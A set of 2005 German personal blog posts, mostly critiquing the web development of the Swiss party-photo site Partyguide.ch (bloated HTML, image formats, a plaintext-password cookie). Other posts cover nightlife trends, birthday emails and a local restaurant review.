In - sagen wir - 80% der Fälle ist es nämlich gar nicht nötig, das Bild neu zu berechnen, weil das Profil keine neuen Bewertungen erhalten hat. Zudem verändern sich die Diagramme von Accounts mit sehr vielen Bewertungen auch weniger rasch - wenn zu 1000 Bewertungen eine weitere dazu kommt, bedeutet dies Änderungen im Promillebereich, die bei einer derart kleinen Grafik kaum zu erkennen wäre.
Ich würde deshalb ein PHP-Script schreiben, dass ausschliesslich beim Eingehen einer neuen Bewertung aktiv wird. Das Script würde durch eine User-Interaktion ("Bewertung") angestossen und würde das bestehende, statische GIF, das mit der User-ID irgendwo Filesystem des Servers liegt, löschen und sofort darauf ein neues Bild aus den neuen Daten generieren. Apache würde es einem danken.
GET-Variablen
Bei weiteren "Untersuchungen" am HTML-Code ist mir zudem noch etwas aufgefallen. Die Entwickler scheinen keiner konsequenten Linie zu folgen, wie GET-Variablen benannt werden. Für mich ist eine konsequente Durchsetzung von Namenskonventionen das A und O des Programmierens. Wer dies als lästige Erfindung von Klugscheissern empfindet, sollte sich einen anderen Job suchen. Insbesondere gerade wenn man im Team an einem Projekt arbeitet, sind solche Konventionen unbedingt notwendig:
URL, um das Profil eines Users anzuzeigen:
http://www.partyguide.ch/user_details.php?my_pic_member_id=30689
Andererseits verwendet man innerhalb dieser Rubrik dann etwas völlig anderes:
URL, um hochgeladene Bilder eines Profiles anzuzeigen:
http://www.partyguide.ch/user_details_fotos.php?username=mad4you
Fürchterlich! Einerseits heissen die GET-Variable unterschiedlich, bezeichnen aber schlussendlich denselben user, andererseits scheint man sich bei Partyguide auch nicht im Klaren zu sein, ob man nun jetzt mit dem Usernamen arbeiten will (der törichterweise Umlaute und Sonderzeichen enthalten kann), oder doch der eindeutigen User-ID, die wohl dem Inhalt einer Tabellenspalte entspricht.
Verräterische Cookies
Dieser Punkt hier hat für Partyguide überhaupt keine Auswirkung auf Bandbreite oder Performance der Server. Erwähnenswert ist er aber allemal.
Die Entwickler von Partyguide haben nämlich wieder einmal einen Tritt ins Fettnäpfchen gewagt und zeigen, dass sie sicherheitstechnisch kaum auf dem Laufenden sind. Ich frage mich gar, ob man überhaupt sensibilisiert ist? Wohl kaum ...
Jedenfalls haben die Vollprofis dort entschieden, dass das Account-Passwort der Benutzer im Klartext auf der Festplatte der Anwender gespeichert wird (geniales Hilfsmittel: Cocoa Cookies 0.7):
.partyguide.ch sess_psw / ********
Dies geschieht dann, wenn der User 'Autologin' angewählt hat und sich so nicht bei jedem Besuch mit seinen Zugangsdaten authentifizieren muss. Man kann einwenden, dass dies auf Privat-Computern keine grosse Rolle spielt - doch mir ist es nicht wohl, wenn eines meiner Passwörter in Text-Dateien auf dem Computer herumliegt und nur darauf wartet, von einem Trojaner etc. ausgelesen zu werden. (Ich habe einen Mac, weshalb ich mir deutlich weniger Sorgen machen muss als Windows-Anwender).
Auch wenn man die Autologin-Funktion nicht verwendet, steht man mit heruntergelassenen Hosen da. Denn ist man einmal eingeloggt, wird das Passwort bei jedem Request an .partyguide.ch mitgesendet. Das schreit förmlich nach einer fiesen Hacker-Attacke, um das Passwort im Klartext abzufangen. Mittel und Wege dazu gibt es allemal - kommt das HTTP-Paket bei einem Menschen mit bösen Absichten vorbei, ist es passiert.
Vielleicht sollte sich die Verantwortlichen doch überlegen, zumindest einen MD5-Hash des Passwortes zu generieren und diesen auf den Rechnern der Anwender als Cookie zu hinterlegen. So ist immerhin die Gefahr gebannt, dass Profis mit einem Blick erkennen, wie das Passwort im Klartext lautet. Dass damit aber der Missbrauch nicht ausgeschlossen ist, bleibt klar - da man den Hash vorliegen hat, kann man sich auch in Zukunft frischfröhlich anmelden.
Weitere Beispiele folgen garantiert - to be continued ...
Labels: Partyguide
Montag, Dezember 26, 2005
Effiziente Web-Projekte anhand von Partyguide, Teil 1
Bereits in mehreren Blog-Beiträgen (anschliessend hier) habe ich mich über die Amateurhaftigkeit von Partyguide aufgeregt. Da Kritik aber selten etwas bringt, möchte ich in dieser neu gestarteten Serie in unregelmässigen Abständen anhand der Architektur von Partyguide die gröbsten Schnitzer aufzeigen, die Internet-Frickler begehen, wenn man ihnen die nötigen Werkzeuge in die Hand drückt.
Heute ziehe ich hierzu die Seite 'Personen suchen' unter 'FlirtCity' heran. FlirtCity ist die kostenlose Variante von Partnerwinner, auf jüngeres Publikum gemünzt.
Notabene: Hinter gutaussehenden Frauen, die dort nach "Abenteuer" suchen, stecken mit allergrösster Wahrscheinlichkeit pubertierende Jünglinge, die sich mit Model-Fotos aus dem Internet einen Spass erlauben. Gemäss dem Motto: "On the Internet, nobody knows you're a dog."
Standards, Standards, Standards
Kaum hat man den HTML-Quelltext geöffnet, sträuben sich bei mir bereits die Haare:
<script language="JavaScript"> ... </script> <html> ... </html>
NEIN! Web-Sites eröffnet man mit dem <html>-Tag. Dass JavaScript-Elemente vor <html> eingebunden werden, zeugt von Stümperhaftigkeit und Unkenntnis geltender Standards. Vor dem <html>-Tag steht höchstens ein
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
Transfervolumen schonen
Aufrufe auf Partyguide zeigen, dass die "Macher" Probleme haben, die Infrastruktur (Hardware: Server) resp. den Traffic (Software: Datenfluss) zu finanzieren. Dies ist nicht verwunderlich, denn der Hauptbestandteil von Partyguide sind die unzähligen Bilder, die an Parties in der ganzen Schweiz geschossen wurden und nun dem Publikum zur Schau gestellt werden. Das Problem ist hier einfach, dass Bilder ein Vielfaches grösser sind als normale Text-Seiten. Und leider kostet im Internet heute - vereinfacht gesagt - nur noch die übertragene Datenmenge. Während Partyguide ein Bild überträgt, kann bspw. eine News-Site ihre Artikel für dieselben Kosten - sagen wir - zehnmal übertragen. Ziel müsste es also für das Team hinter Partyguide sein, den Datenfluss so effizient wie möglich zu auszunutzen - und klein zu halten. Kein Byte sollte zuviel übertragen werden, denn bei Tausenden von täglichen Besuchern summieren sich solche "Kleinigkeiten" zu vielen Megabytes an verschwendetem Traffic an.
Zwei Beispiele, wieso Partyguide hier noch viel zu lernen hat:
Von Benutzern hochgeladene Bilder
Benutzer von Partyguide haben ein eigenes Profil. Dort kann man Angaben über die eigene Person publizieren (Alter, Wohnort, Lieblings-Clubs etc.) und unter anderem auch persönliche Bilder hochladen.
Desöfteren fallen mir bei der Anzeige der persönlichen Bilder aber lange Verzögerungen auf. Ein Blick auf die übertragenen Grafikdateien zeigt dann meistens dieselbe Ursache: Anstatt platzsparende JPEG-Dateien zu übertragen, kommen dann und wann BMPs daher. Notabene mit der Endung .jpg, was eine aktive Täuschung jedes Browsers darstellt - die meisten Browser stören sich aber an der falschen Endung nicht - anscheinend ist die falsche Erweiterung immer noch ein weit grassierendes Problem im Netz. Jeder halbwegs Sachverständige weiss aber, dass BMP keine Komprimierung aufweist und verlustfreie Bilder beinhaltet. Deshalb sind die Bilder teilweise um den Faktor 10 grösser als dasselbe, komprimierte Sujet im JPEG-Format.
Wer ist der Schuldige? Zuerst einmal die unzähligen unbedarften Windows-User, die BMP-Dateien auf Partyguide hochladen. Doch ihnen kann man nicht viel vorhalten - die wenigsten Benutzer kennen Unterschiede der einzelnen Grafik-Formate. Sie sind Endanwender, die sich um solchen "Käse" nicht kümmern möchten.
Würden bei Partyguide fähige PHP-Entwickler arbeiten, würden spätestens aber diese solchen Unfug abfangen und die empfangenen Bilddateien nach dem Upload in das JPEG-Format umkodieren. Machen sie aber nicht. Und "bezahlen" bei jedem Aufruf einer BMP-Bilddatei mit verschwendetem Transfervolumen.
Nachtrag: Am 29. September habe ich die Entwickler von Partyguide auf das Problem aufmerksam gemacht. Die läppische Antwort:
werden sie auch [Umkonvertierung von BMP-Dateien]. es kommt jedoch vereinzelt vor, dass die bilder nicht konvertiert werden können, oft wenn die datei zu gross ist...
Ein Kommentar erübrigt sich wohl ...
Sich wiederholenden HTML-Code vereinfachen
Auch HTML-Code kann in den Händen von unbedarften, amoklaufenden Entwicklern zu Bloatware verkommen. Ein gutes Beispiel stellt die Seite dar, die Suchresultate nach FlirtCity-Inserenten darstellt. Dort werden alle Benutzer aufgelistet, die den Suchkriterien entsprechen. Eine Tabellenzeile sieht folgendermassen aus:
<tr bordercolor="#000000" valign="middle">
<td bgcolor="#D5EAF4" height="25" class="text_klein" width="180"><A HREF="../user_details.php?my_pic_member_id=157382" onClick="NewWindow(this.href,'name','775','650','yes');return false">Croatia_Lady </td>
<td bgcolor="#D5EAF4" height="25" class="text_klein" width="25"><IMG onmouseover="return overlib('<center><img src=http://images.partyguide.ch//memberfotos_thumbs/157382.jpg></center>', CAPTION, 'Foto');" onmouseout="return nd();" SRC="http://partyguide.ch/img/foto.gif" BORDER=0> </td>
<td bgcolor="#D5EAF4" height="25" class="text_klein" width="25">18 </td>
<td bgcolor="#D5EAF4" height="25" class="text_klein" width="160">Steffisburg </td>
<td bgcolor="#D5EAF4" height="25" align="left" class="text_klein" width="25"><IMG SRC="../img/wappen_be.gif"> </td>
<td bgcolor="#D5EAF4" height="25" align="left" class="text_klein" width="30"><IMG SRC="../img/ch.gif"> </td>
<td bgcolor="#D5EAF4" height="25" align="right" class="text_klein" width="130">25.12.2005 21:48:00 </td>
<td bgcolor="#D5EAF4" height="25" align="right" class="text_klein" width="30"><A HREF="../user_details.php?my_pic_member_id=157382" onClick="NewWindow(this.href,'name','775','650','yes');return false"><IMG SRC="../img/info.gif" BORDER=0></A> </td>
</tr>
<tr bordercolor="#000000" valign="middle">
<td bgcolor="#FFFFFF" height="25" class="text_klein" width="180"><A HREF="../user_details.php?my_pic_member_id=52676" onClick="NewWindow(this.href,'name','775','650','yes');return false">Nini86 </td>
<td bgcolor="#FFFFFF" height="25" class="text_klein" width="25"><IMG onmouseover="return overlib('<center><img src=http://images.partyguide.ch//memberfotos_thumbs/52676.jpg></center>', CAPTION, 'Foto');" onmouseout="return nd();" SRC="http://partyguide.ch/img/foto.gif" BORDER=0> </td>
<td bgcolor="#FFFFFF" height="25" class="text_klein" width="25">19 </td>
<td bgcolor="#FFFFFF" height="25" class="text_klein" width="160">Schliern </td>
<td bgcolor="#FFFFFF" height="25" align="left" class="text_klein" width="25"><IMG SRC="../img/wappen_be.gif"> </td>
<td bgcolor="#FFFFFF" height="25" align="left" class="text_klein" width="30"><IMG SRC="../img/ch.gif"> </td>
<td bgcolor="#FFFFFF" height="25" align="right" class="text_klein" width="130">25.12.2005 20:00:00 </td>
<td bgcolor="#FFFFFF" height="25" align="right" class="text_klein" width="30"><A HREF="../user_details.php?my_pic_member_id=52676" onClick="NewWindow(this.href,'name','775','650','yes');return false"><IMG SRC="../img/info.gif" BORDER=0></A> </td>
</tr>
Je nach zurückgelieferten Resultaten wiederholt sich dieser HTML-Block dutzende, ja manchmal hunderte Male.
Schlichtwegs eine Katastrophe! Vielleicht mag man in den späten Neunzigern solchen Code als vorbildlich eingestuft haben - im 2005 ist er es garantiert nicht mehr.
Fehler 1 - Sich wiederholender Code
Jede Tabellenzelle erhält eine Hintergrundfarbe zugewiesen. Jede Zeile soll alternierende Farben aufweisen, um die Lesbarkeit der Resultate zu verbessern. Die Idee dahinter ist löblich - die Umsetzung unter aller Sau. Jeder Tabellenzelle wird auch explizit eine Höhe zugewiesen (height). Manchmal findet man auch das Attribut align, das die Ausrichtung des Textes innerhalb einer Zelle steuer. Und zu guter letzt wird auch fast jeder Zelle noch eine CSS-Klasse zugewiesen.
Die von mir vorgeschlagene Lösung sieht viel einfacher aus - gemäss meinem Credo "Keep it simpleTM":
Zuerst einmal kreiert man ein CSS-File und bindet dieses per Include in jede Seite ein. Deren Inhalt (auszugsweise):
table.tblListing {}
table.tblListing tr td {background-color:#FFFFFF;height:25px;font-size:10px;padding:4px;}
table.tblListing tr.trOdd td {background-color:#D5EAF4;}
Der korrespondierende HTML-Code für die Tabelle sähe folgendermassen aus:
<table> <colgroup> <col width="180" /> <col width="25" /> <col width="25" /> <col width="160" /> <col width="25" /> <col width="30" /> <col width="130" /> <col width="30" /> </colgroup> <tr class="trOdd"> <td>...</td> <td>...</td> <td>...</td> <td>...</td> <td align="right">...</td> <td>...</td> <td>...</td> <td align="right">...</td> </tr> <tr> <td>...</td> <td>...</td> <td>...</td> <td>...</td> <td align="right">...</td> <td>...</td> <td>...</td> <td align="right">...</td> </tr> </table>
Fazit: Unmengen an unnötigen Zeichen werden durch einfachste Hilfsmittel wie intelligenteren HTML-Formulierungen und Cascading Stylesheets (CSS) eingespart. Man beachte auch den colgroup-Block zu Beginn der Tabelle. Heutzutage ist es wirklich nicht mehr nötig, die Spaltenbreite in jeder Zeile neu zu definieren. A propos: Wieso hat die Tabelle eine fixe Breite?
Fehler 2 - URIs
Der Inhalt der Zellen weist auch einige Links und Verweise auf Grafikdateien auf. Auch hier könnte man mit intelligenter Strukturierung der Datenablage Doppelläufigkeiten vermeiden. Wieso Bilder mit
<IMG SRC="../img/wappen_be.gif">
eingebunden werden, ist mir schleierhaft. Ich würde immer absolut addressieren und nur dort, wo dies definitiv nicht möglich ist, davon abweichen. So könnte man sich die .. sparen. Hochgerechnet mit Anzahl Zeilen mal Anzahl Besuche mal 8 (ergibt Bytes) sollte für einen Tag dann doch eine stattliche Summe an eingesparter Datenmenge ergeben.
Fehler 3 - JavaScript-Funktionsnamen
Programmierer sollten wenn möglich aussagekräftige Namen für ihre Funktionen verwenden. Auf den ersten Blick ist dies bei
<A HREF="../user_details.php?my_pic_member_id=52676" onClick="NewWindow(this.href,'name','775','650','yes');return false"><IMG SRC="../img/info.gif" BORDER=0></A>
gut gelöst. Ich sehe auf den ersten Blick, dass hier also ein neues Fenster geöffnet werden soll. Doch vergegenwärtigt man sich, dass diese Funktion in jeder Zeile der Resultate auftaucht, wird es mir übel. Ich würde in einem solchen Fall dann doch auf die Lesbarkeit verzichten und die Funktion zusammenschmelzen:
<a href="#" onclick="win(52676)">...</a>
Die JavaScript-Funktion würde also die redundanten Angaben in der Funktion selber beeinhalten, anstatt all die identischen Angaben in jeder Zeile zu wiederholen:
function win(intUserId) {
var intWinWidth = 775;
var intWinHeight = 650;
var strURL = '/user_details.php?my_pic_member_id=' + intUserId;
window.open(strURL,intWinWidth,intWinHeight,...);
return false;
}
Fazit
Da ist noch viel zu tun! Ich bleibe dran und bin mir ganz sicher, auch in den nächsten Folgen dieser Serie viele weitere Leckerbissen präsentiert werden können.
Labels: Partyguide
Sonntag, Dezember 25, 2005
Party-Essentials II: Handschuhe
Nachdem ich im ersten Teil dieser mehrteiligen Serie bereits auf mitgebrachte iPods bei Partygängern verwiesen habe, darf der am Heilig Abend entdeckte Trend nicht fehlen: Handschuhe. Plant er noch einen Einbruch? Oder an die obligate Schlägerei nach Feierabend? Wir wissen es nicht ... Auf jeden Fall ist ein solch vorsichtiges Verhaltenen der heutigen Zeitgenossen genügend zu würdigen. Ich empfehle für den Weihnachtsabend noch einen Velohelm zur Komplettierung der Ausrüstung.
PS: Wird wohl wie Indianer-Winterschuhe für die Damen und dem Wiederaufstieg der VoKuHiLa-Frisur unter Secondos einfach ein weiterer aus Mailand importierter Trend sein ...
Labels: Partyguide
Mittwoch, Dezember 07, 2005
Partyguide sucks (revisited)
Letzte Woche (am 29. November) war es (wieder einmal?) soweit: Die Entwickler (ist die Mehrzahl überhaupt korrekt?) hinter Partyguide.ch zeigten sich von ihrer besten Seite.
Dies bestärkte mich im bereits vorher geäusserten Verdacht, dass hier weniger erfahrene PHP-Entwickler als Abkömmlinge des Mr. Bricolage am Werk sind.
Immerhin: Das Verbesserungspotential der Web-Site (HTML-Code, Performance-Tuning bei PHP und MySQL) bleibt so ungewollt enorm.
Anstelle also meterlange Titel wie ...
Regionalmanager Zürich Assistent
Quelle: dilorenzo
zu vergeben, sollte man in die Ausbildung von PHP-Cracks investieren.
Denn: Die Idee der Site und die User-Basis wären im Grund genial ...
Labels: Partyguide
Mittwoch, September 28, 2005
Newsletter-Silvan über die heutige Hip-Hop-Jugend
Eigentlich schmeisse ich die nervigen elektronischen Newsletter von tilllate.ch immer gleich weg, ohne sie gross zu beachten. Als Absender sticht aber immer dieser "Silvan | tilllate" hervor - für mich mittlerweile Inbegriff des auch in der Schweiz hausierenden E-Mail-Spams.
Silvan gibt sich Mühe, in jeder Ausgabe des Newsletters dennoch ein gewisses Niveau zu erreichen und analog zu einer Zeitungskolumne Themen aufzugreifen, die die Welt bewegen. Heute hat er es nach Millionen von Mails denn auch endlich geschafft, meine Aufmerksamkeit zu wecken. Doch lest selbst:
Hallo Mad4you
Halb eins, der Vierer hält vor der Säulenhalle. Eine Gruppe von 17-jährigen kämpft sich ins Tram. Das Bitchy-Chick in überengen Miss-Sixty fällt hin, ihre Kollegin kreischt auf: "Mann Du bisch ja huere bsoffe!". Lautes Gelächter. In dem Moment tönt ein "I like to move it - wapedi-wup-wup" aus der Fake-LV-Handtasche. HILFE! Crazy-Frog-Alarm. Wo ist die Notbremse? Ich muss raus!
"Mein Gott... die heutige Jugend", seufze ich, "Alkohol, Vergnügungssucht, Geschmacksverdrehungen und reine Orientierung an Gruppenmustern. Fühlt sich dabei noch unheimlich innovativ. Dabei sehen doch alle exakt gleich aus. Hose in den Socken. Cap schräg aufgesetzt. Uniformiert in phat farm, southpole und fubu..." - "Eeehm, Silvan", unterbricht meine Freundin in kritischem Ton, "ich habe doch Bilder von dir in diesem Alter gesehen: Business-Shirt und Kaschmir-Pulli über den Schultern... wohl alles Markenartikel. Du bist regelmässig ins Schauspielhaus gegangen, obwohl du in Wirklichkeit eher auf Teenie-Filme à la American Pie stehst. Und was hat mir André von Euren Samstag-Abenden erzählt? Kneipentouren im Niederdorf? Nicht viel besser..."
Ich spüre wie mein Backen rot anlaufen. Zähneknirschend gebe ich ihr recht. Damals bin ich mit in der Tat mir meinem eigenartigen Verhalten supercool vorgekommen. Als hätte ich die Weisheit mit Löffeln gefressen. Als hätte ich einen wahnsinnig individuellen Stil. Dabei hatte ich mich doch nur an den Goldküstenbuben und orientiert.
Womöglich gehört diese Phase zu den Teeniejahren. Die 17-jährigen Girls aus dem Tram werden bestimmt irgendwann älter und reifer... und schauen dann mit 27 kopfschüttelnd auf ihre jüngeren Zeitgenossen... "Mein Gott.... die heutige Jugend", werden sie seufzen.
Wenn er auch recht hat - wie die Jungen sich nicht ändern, sollten sich auch die "Alten" nicht ändern: Mich kotzen diese Hip-Hoppers mächtig an. Schon nur, weil die alle mit diesen Billig-MP3-Playern aus Südkorea und Taiwan herumlaufen - dabei gäbe es doch Apples iPod. Aber den kann man sich halt nicht um den Hals hängen. Das Beste: Den MP3-Player legt man heutzutage nicht mal mehr im Ausgang ab. Anscheinend ist es mega-hip, mit dem Gerät seinen Status als Pimp zu markieren. Ich frage mich nur, ob man vom Sound des Players noch etwas mitkriegt, wenn der DJ die Anlage auf verbotene 100dB aufdreht? Klärt mich jemand auf, was das genau soll?
Ah, und noch etwas: Sind meinen Lesern auch schon diese Plüsch-Trainerhosen in den Farben Pink oder Weiss aufgefallen? Die erinnern mich unweigerlich an die Pyjamas, die ich in früher Jugend getragen habe ... Einer meiner schlimmsten Erlebnisse war denn auch, als ich (im Traum, wohlgemerkt!) eines Tages im Pyjama in die Primarschule ging und dies erst im Klassenzimmer bemerkte. Heute scheint das überhaupt kein Albtraum mehr zu sein, man begebe sich nur für wenige Minuten an den Treffpunkt im Bahnhof Bern und beobachte die Gören.
Was wohl als nächstes In sein wird? Vader 77-Shirts?
Labels: iPod, Partyguide
Sonntag, September 25, 2005
Mein Geburtstag im Netz
Heute gab es ein Vierteljahrhundert Mario zu feiern - im realen Leben, selbstverständlich (inkl. Geburtstagsständchen, vorgetragen von vier professionel musizierenden Verwandten *grins*), aber auch im virtuellen! Meine Mailbox quoll ... gut, das wäre jetzt übertrieben, meine Mailbox füllte sich im Laufe des Tages mit einigen Mails. Keine persönlich verfassten Gratulationsmails aus aller Welt, sondern maschinell von Computern generierte Standardmails.
Erst beim überfliegen all der zugesandten Mails merkt man, wo man alles seine persönlichsten Daten hinterlassen hat. Unheimlich:
- unbekannt: MacUser.de
- 1:15 Uhr: Citydisc mit einem 10% Rabatt-Coupon - keine Erwähnung des Geburtstages, notabene
- 3:00 Uhr: Mr. Lens mit einem 5 Franken-Gutschein
- 6:16 Uhr: Partyguide.ch
- 11:22 Uhr: Orange
Reminder
Aber auch sonst erfreuen sich die elektronischen Kommunikationsmittel grosser Beliebtheit. SMS und E-Mail sind heutzutage die Gratulationsmittel erster Wahl. Und damit niemand die Geburtstage der anderen mehr vergisst, gibt es einige Hilfsmittel, die von findigen Programmierer erfunden wurden. Partyguide ist in der Hinsicht sehr nützlich - informiert es doch alle 'myfriends' eines Users über dessen Geburtstag.
Ausserdem: Zum ersten Mal, seit ich mich erinnern kann, ist es dank Partyguide auch auf einfachste Art und Weise möglich, herauszufinden, wer denn heute auch noch Geburtstag hat. Sehr lustig - es gab am 25. September eine ganze Menge Partyguide-User, die wie ich etwas zu feiern hatten. Nicht schlecht staunte ich, als mir eine wildfremde Person gratulierte und darauf hinwies, dass sie satte 10 Jahre jünger sei als ich (Jahrgang 1990!). Himmel, ich bin wirklich ein alter Knochen!
Software-Tipp
Heute morgen riss ich mich zusammen und machte mich auch auf die Suche nach einem Tool, dass die Geburtstage aus dem Apple Address Book mit Apple iCal synchronisiert. Denn dummerweise sind die Apple-Entwickler anscheinend derartige Geeks, dass sie wohl keine Freunde haben und somit auch nie deren Geburtstage vergessen (diese Synergie wurde glücklicherweise mit Mac OS X Tiger ausgebügelt - die Geburtstage synchronisieren sich jetzt automatisch). Wer aber wie ich mit Mac OS X Panther unterwegs ist, sollte sich unbedingt BirthdayCal reinziehen. Eines der nützlichsten Tools der letzten Wochen und Monaten. Man merkt, dass der Programmierer genau wusste, was wir, die Anwender, uns von einer solcher Applikation wünschen.
Out of Africa
Sehr gefreut habe ich mich heute über das Telefonat von Melanie. Direkt aus dem "Busch", sozusagen. Die Leitungsqualität wär nicht optimal, aber man konnte sich verständigen. Der Weg ist das Ziel, wie man so schön sagt. Es war sehr schön, ihre Stimme wieder einmal zu hören - gleichzeitig machte es mich aber auch traurig, dass wir den Geburtstag für einmal nicht zusammen feiern konnten. Ich denke, dass es ihr ähnlich ging ... *snüff* Irgendwie vermisse ich sie, bereits jetzt, in Woche 3.
Labels: Partyguide
Sonntag, August 21, 2005
Erster Eindruck: GUS-Restaurant Sternen, Neuenegg
Heute war ich mit Kollege Vinçe & Cie. das erste Mal im neu eröffneten GUS-Restaurant Sternen in Neuenegg. Das Lokal stand mehrere Jahre leer und wurde vor einer Woche unter neuer Leitung mit der finanzstarken und risikofreudig expandierenden GUS im Rücken wiedereröffnet.
Mein erster Eindruck: Sehr empfehlenswert, gerne wieder!
Wir waren insgesamt 7 Personen und liessen uns kurz vor 8 Uhr auf Speis und Trank im Restaurant nieder. Die Bedienung war sehr freundlich (Anja (im Partyguide Top-Pic-Ranking auf Seite 8 von 315) und Jus-Student Christoph, plus eine etwas ältere Dame, mir leider unbekannt).
Baulich geändert hat sich nicht viel - die Fassade ist laut Murphy immer noch gleich hässlich wie unter dem alten Pächter. Im Gästesaal finden sich neue Tische und Bestuhlung, sowie eine neu geschliffene Wandtäferung. Der gegen Laupen zeigende Teil wurde stark verändert, anstelle des hinteren Sälis gibt es dort nun eine Bar. Die Cubanito Bar, die gegen Flamatt zeigt, war geschlossen.
Grösster Pluspunkt: Das Lokal ist rauchfrei! Endlich nimmt man die Anliegen der militanten Nichtraucher ernst - wenn ich für ein schmackhaftes Essen schon zahle, möchte ich dabei nicht vom Rauch vom Nachbartisch belästigt werden. Hoffentlich macht dieses Verbot auch in anderen Fresstempeln Schule!
Ich habe mir eine Gazpacho-Suppe zum Entree gegönnt, gefolgt von einem Rahmschnitzel mit Nudeln und zum Abschluss noch ein gutes, altes Käfeli. Als Getränk gab's eine Stange (leider Feldschlösschen und nicht Cardinal, aber deswegen wollen wir ihnen hier nicht den Strick drehen). Daran gab es überhaupt nichts auszusetzen - sehr erfreulich war zudem, dass man uns zur Hauptspeise zusätzlich Brot anbot (sonst sehr selten) und auch noch eine Schale Pommes vorbeibrachte, da zwei von uns auf ihrem Sternen-Teller (laut Meinung der Serviererin!) zuwenig der fritierten Kartoffeln liegen hatten. Man geizt also wirklich nicht mit den Rohstoffen, vorbildlich!
Der Preis: 34.-- SFr. Leider kann ich das mangels Erfahrung schlecht beurteilen - für Schweizer Verhältnisse und die Qualität würde ich es als angemessen bezeichnen.
Einer der Mitesser fand denn auch, dass der Bären wohl angesichts dieser Konkurrenz bald schliessen könne. Ob da was dran ist, werden wir sehen. Gemäss der Meinung der im Dorf vorherrschenden "Grossen Partei" (tm) belebt Konkurrenz ja das Geschäft - wollen wir das nun auch hier hoffen. Insgesamt gibt es im Dorf Neuenegg selber folgende Lokale, die Erwähnung verdienen:
- Restaurant Sternen
Kommentar erübrigt sich aufgrund dieses Artikels. - Landgasthof Bären
Altehrwürdiger Bau, gemäss eigener Werbung der "älteste Landgasthof im ganzen Kanton". - Café Dorfplatz
Von Kennern auch liebevoll als Tratsch- und Klatsch-Hauptquartier unseres Dorfes bezeichnet - alle nennenswerten Gerüchte nehmen haben hier ihren Ursprung. Besuchern zufolge auch sehenswerte Servierdüsen. - Restaurant Sportinn
Beim Tennisclub, u.a. Treffpunkt einer Jassrunde.
Wir werden sehen, wie sich die Situation entwickelt. Die Vielfalt bleibt jedenfalls hoffentlich erhalten.
Bis zum nächsten Besuch, weiter so!
Labels: Neuenegg, Partyguide
Montag, August 15, 2005
Partyguide sucks
Obwohl ich bekennender Benutzer von Partyguide.ch bin - überzeugen konnte mich das Produkt technisch und teilweise auch konzeptionell noch nie.
Partyguide gehört wohl neben Tilllate.ch (Kollege Wittwers Anti-Projekt kommt wohl hoffentlich bald - kreativ ist die Namensgebung auf jeden Fall) und Lautundspitz.ch zu den Top-3 der "Seht-her-ich-war-auch-an-dieser-Hundsverlochete"-Sites, die Photos von Parties zur Schau stellen. Dazu schwärmt mittlerweile die halbe Nation in Form von Hobby-Fotografen mit ihren Hobby-Kameras aus (na gut, einige haben wirklich gute Dinger mit obligatorischem Profi-Blitz dabei - wie die Nikon D70) und hüllt die Location ins Blitzlichtgewitter schlechthin. Dass die Gratis-Eintritte dazu einen grossen Anreiz darstellen, ist nur ein positiver Aspekt - mit einer Kamera in der Hand und etwas aufgelockert durch die promillehaltigen Getränke kommt man hierzulande eben doch noch vorzüglich mit dem anderen Geschlecht in Kontakt. Und noch etwas fällt auf: Insbesondere aufgetakelte Frauen sind mittlerweile derart konditioniert, dass man nur noch die Kamera zu zücken braucht, und man schmeisst sich in Pose :-)
Doch was stört mich nun an Partyguide?
Zu viele Fotos
Partyguide titelt heute Montag, 15. August 2005:
PartyGuide.ch liefert über 10'000 Bilder der Streetparade 2005
Bei der quantitativen Auswertung kriegen die Jungs um den Member und Gründer mit der Partyguide-ID '1', Jason (Mitgliedschaft zwingend) bzw. für alle anderen: Photos (frei zugänglich dank einem netten eMeidi.com-Script), eine glatte 6.
Die Frage nach der Qualität der Bilder stellt sich aber leider sehr oft - niemals sind es die 10'000 Bilder auch wert, angeschaut zu werden.
Auch wage ich hiermit die These aufzustellen, dass ...
Party-Bilder-Sites die Produktivität der vor allem jüngeren Angestellten und Azubis stark zu mindern vermögen. Betroffen davon ist insbesondere die Dienstleistungsbranche (Versicherungen, Banken, Verwaltung, Administration), da die Leute dort in der Regel über einen Internet-Zugang am Arbeitsplatz verfügen und - wichtig! - anscheinend auch massenhaft Zeit, sich solche Angebote während der Arbeit "reinzuziehen".
Unwissenschaftlich wie ich bin, grenze ich das oben grob definierte Zielpublikum noch genauer ein: Schickimicki-KV-Tussen und deren metrosexuellen Gegenparts, die auffällig häufig im Bankensektor (Credit Suisse & Co.) arbeiten.
Von wo ich diese Infos habe? Per Zufall stiess ich vor einigen Jahren auf die Zugriffs-Statistik von Tilllate.ch - sie war anscheinend für alle Welt offen wie ein Scheunentor. Nur die URL musste man kennen, und schon konnte sich der interessierte Surfer ein sehr schönes Bild über die Zugriffe machen. Ein vorteilhaftes Feature der eingesetzten Statistik-Software Webalizer ist es, die Herkunft der Besucher aufzuschlüsseln. An der Spitze standen mit grossem Abstand der Proxy-Server von Credit Suisse (www-gw*.credit-suisse.com), Winterthur (wv43.winterthur.ch?) und Zürich Versicherungen (ns*.zurich.com?). Leider habe ich die URL der Statistik vergessen - die wohl mittlerweile auch hoffentlich passwortgeschützt ist. Dennoch blieb mir dieses Fakt als Aha-Erlebnis präsent.
HTML aus den 90ern, Pop-Up-Wahnsinn neu erfunden
Die Bedienung der Web-Site ist katastrophal - für alles und jedes öffnet sich ein Pop-Up-Fenster. Das Layout ist für 2005 schlichtweg fürchterlich und hätte längstens eine Auffrischung verdient. Schaut der Web-Developer dann auch noch in den HTML-Quelltext, eröffnen sich weitere Abgründe: Da wird tatsächlich noch der <font>-Tag verwendet. Pfui! Den haben wir doch noch vor der Jahrtausendwende in die Verbannung geschickt - schliesslich gibt es ja heutzutage CSS1+2. Selbstverständlich ist dieser olle Tag nur die Spitze des Eisbergs, doch die meisten meiner Leser würden weitere technische Ausführungen nur ärgern. Zwischenbilanz: Die Kenntnis von CSS2 scheint die Entscheider dort aber noch nicht erreicht zu haben - dabei brächte diese Technologie einige Vorteile mit sich, u.a. der Verzicht auf ...
Bandbreiten-Gönner
